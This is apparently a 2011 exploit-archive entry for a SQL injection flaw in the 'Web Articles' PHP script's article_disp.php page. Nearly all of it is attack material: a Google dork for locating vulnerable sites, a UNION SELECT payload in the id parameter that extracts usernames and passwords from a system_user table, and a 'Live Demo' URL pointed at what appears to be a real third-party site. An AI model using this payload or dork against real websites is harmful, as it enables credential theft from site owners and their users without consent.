Web Articles suffers from a remote SQL injection vulnerability.
649e8dcfa5b192c8f5efc8e2b94a94251a1cf063d3ea8c823130f623cf5de36b
# Exploit Title: Web Articles(article_disp.php)SQL Injection Vulnerability
# Google Dork: inurl:"article_disp.php
"
# Date: 24/01/2011
# Author: PenetraDz
# AuthorEmail:PenetraDz@hotmail.com
# Home:Algeria/Freedom tO Palestine
# Language: php
# Tested on: windows xp sp3 en
# Exploit:http://www.site.com/path/article_disp.php?id=-67+union+select+1,2,Vuname,4,vpassword,6,7,8,9,10+from+system_user--
#Live Demo:http://skillscape.net/skillscape_article_disp.php?id=-67+union+select+1,2,Vuname,4,vpassword,6,7,8,9,10+from+system_user--
# /article_disp.php?id=-67+union+select+1,2,Vuname,4,vpassword,6,7,8,9,10+from+system_user--
---------------------------------------------------------